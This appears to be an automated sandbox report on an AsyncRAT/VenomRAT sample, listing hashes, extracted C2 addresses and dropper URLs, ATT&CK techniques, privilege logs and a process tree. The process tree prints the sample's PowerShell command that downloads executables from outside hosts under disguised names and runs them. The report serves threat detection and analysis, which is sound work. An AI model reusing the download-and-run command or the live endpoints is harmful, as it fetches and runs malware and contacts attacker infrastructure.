asyncrat | d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a

Analysis

max time kernel
144s
max time network
119s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
18-08-2024 19:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Size

75KB
MD5

6c86e854bfcffef8c6b156ff59c5d6d3
SHA1

8f9bd0ba4912b99de55922c91919a4df106d2278
SHA256

d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a
SHA512

b03618095eb784422bb3ae600784e087cc517139cdd5bb5b93ba25d9f69e1e7da844ea779b7056e5a9b5c015ca706b55b502128224804c29fab7cd6a56be1fbf
SSDEEP

1536:02kU8UnRCE8PMRkkUJy8jd1bK/K9Ina4kzkLLVclN:0vUJR6PMRkHJ9d1bK3a4kiBY

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu.exgaming.click

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

109.38.143.137:8888

89.99.115.113:8888

192.168.178.69:8888

Mutex

zwkzzurhbadjvo

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/4892-1-0x0000000000460000-0x0000000000478000-memory.dmp	VenomRAT

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
3460	powershell.exe
5020	powershell.exe
712	powershell.exe
5076	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
712	powershell.exe
712	powershell.exe
5076	powershell.exe
5076	powershell.exe
3460	powershell.exe
3460	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeDebugPrivilege	712	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeIncreaseQuotaPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSecurityPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeTakeOwnershipPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeLoadDriverPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemProfilePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemtimePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeProfSingleProcessPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeIncBasePriorityPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeCreatePagefilePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeBackupPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeRestorePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeShutdownPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeDebugPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemEnvironmentPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeRemoteShutdownPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeUndockPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeManageVolumePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 33	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 34	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 35	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 36	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeIncreaseQuotaPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSecurityPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeTakeOwnershipPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeLoadDriverPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemProfilePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemtimePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeProfSingleProcessPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeIncBasePriorityPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeCreatePagefilePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeBackupPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeRestorePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeShutdownPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeDebugPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeSystemEnvironmentPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeRemoteShutdownPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeUndockPrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeManageVolumePrivilege	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 33	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 34	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 35	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: 36	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 4892 wrote to memory of 1404	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe	84
PID 4892 wrote to memory of 1404	4892	d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe	84
PID 1404 wrote to memory of 712	1404	cmd.exe	86
PID 1404 wrote to memory of 712	1404	cmd.exe	86
PID 1404 wrote to memory of 5076	1404	cmd.exe	87
PID 1404 wrote to memory of 5076	1404	cmd.exe	87
PID 1404 wrote to memory of 3460	1404	cmd.exe	89
PID 1404 wrote to memory of 3460	1404	cmd.exe	89
PID 1404 wrote to memory of 5020	1404	cmd.exe	93
PID 1404 wrote to memory of 5020	1404	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
"C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aa8efa56e1e40374bbd21e0e469dceb7

SHA1
33a592799d4898c6efdd29e132f2f76ec51dbc08

SHA256
25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

SHA512
ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f26bbd0ef14d682d925899207b9c6c7e

SHA1
de46fb571c8421c33625a682a23fe76b1f199da7

SHA256
5ebacd6ee97e90cd3e6b896ecd9040a9edf00497f4554b7bbf62f7d83a094745

SHA512
caade10fa0bcd34f420e6f07d27d96c141d15e33b81e203c33dc6bc5de1c6f840777a65c76aba42d98b61d215bb2b8866c1c0e0040b5da1aa5971de0fab03e8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c0ea2181c82617b780121adc3a407cc

SHA1
e8b788941f397361c660f6f0f50688debcfe6fce

SHA256
a33f9a0ef79f7dfd3a1a89593877888a3b2ef45db361a3ae1c72a407f719f671

SHA512
31178740283a9f9f6bcdadfd8f914c0601653fdf6840053426eaaa7b2bd274948a666e550c9eff3dc96a687e557133249b262439f284c91cb06ce82ff14134cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h55pupkw.a43.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/712-9-0x0000011BBE570000-0x0000011BBE592000-memory.dmp

Filesize
136KB

Download
memory/712-15-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download
memory/712-16-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download
memory/712-19-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download
memory/712-10-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download
memory/4892-0-0x00007FFFB9073000-0x00007FFFB9075000-memory.dmp

Filesize
8KB

Download
memory/4892-3-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download
memory/4892-1-0x0000000000460000-0x0000000000478000-memory.dmp

Filesize
96KB

Download
memory/4892-54-0x00007FFFB9070000-0x00007FFFB9B31000-memory.dmp

Filesize
10.8MB

Download